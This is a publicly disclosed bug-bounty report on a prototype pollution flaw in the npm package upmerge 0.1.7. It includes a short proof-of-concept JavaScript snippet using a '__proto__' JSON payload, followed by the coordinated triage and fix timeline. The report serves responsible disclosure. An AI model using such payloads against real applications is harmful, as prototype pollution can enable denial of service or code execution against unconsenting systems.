Prototype pollution attack (upmerge)
State Resolved (Closed)
Disclosed publicly 2019-02-04T07:53:24.033Z
Reported To
Weakness none
Bounty
Collapse


Timeline
submitted a report to Node.js third-party modules .
2018-11-11T14:45:55.990Z

Hi team,
I would like to report a prototype pollution vulnerability in upmerge
that allows an attacker to inject properties on Object.prototype.

Module

module name: upmerge
version: 0.1.7
npm page: https://www.npmjs.com/package/upmerge

Module Description

JavaScript Object Merge and Clone for Client or Server side

Vulnerability

Vulnerability Description

this vulnerability type is similar to my report #438274
upmerge is vulnerable to prototype pollution when it merges objects.

Steps To Reproduce:

In the following code snippet, "payload" would come from user-input (JSON data).

var upmerge = require('upmerge');
var payload = '{"__proto__":{"polluted":"upmerge_done !"}}';
var test = {};
console.log("Before: ", test.polluted);
upmerge.merge({},JSON.parse(payload));
console.log("After: ", test.polluted);

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N

Thanks!

Impact

It causes Denial of Service or RCE in some cases.

Regards,
Frans

  • 0 attachments:
vdeturckheim_dev Activities::Comment
2018-11-11T14:46:01.953Z
Hello, Thanks for reporting this to us. Someone will quickly look at this report and triage it.


dienpv Activities::Comment
2018-11-12T14:43:12.040Z
any update?


marcinhoppe Activities::BugTriaged
2018-11-16T12:25:48.775Z
I was able to reproduce and confirm the issue as you described and will triage this report as vulnerability. I will invite the package maintainer to this issue.


jazzfog Activities::ExternalUserJoined
2018-11-19T19:43:52.800Z


jazzfog Activities::Comment
2018-11-19T19:48:32.203Z
Thanks for the report, i will check. Can you, please, clarify how exactly this can be harmful?


dienpv Activities::Comment
2018-11-20T01:46:02.591Z
i recommend you a nice research of holyvier `https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf` for understanding how this issue can be exploited.


marcinhoppe Activities::Comment
2018-11-21T10:54:18.906Z
@jazzfog Let us know when you have the fix available so we can coordinate disclosure. Also, if we can help with anything, just let us know.


marcinhoppe Activities::Comment
2018-12-07T08:05:13.198Z
@jazzfog Did you have a chance to take a look at this report?


dienpv Activities::Comment
2018-12-28T15:22:33.404Z
heyy @jazzfog


jazzfog Activities::Comment
2019-01-16T07:59:50.785Z
Hey, Sorry for the delay, landed the fix. Thanks for the report!


marcinhoppe Activities::ReportSeverityUpdated
2019-02-04T07:47:55.972Z


marcinhoppe Activities::BugResolved
2019-02-04T07:48:01.713Z


marcinhoppe Activities::Comment
2019-02-04T07:53:01.710Z
@dienpv @jazzfog I will disclose this report now.


marcinhoppe Activities::AgreedOnGoingPublic
2019-02-04T07:53:08.531Z


marcinhoppe Activities::ManuallyDisclosed
2019-02-04T07:53:23.948Z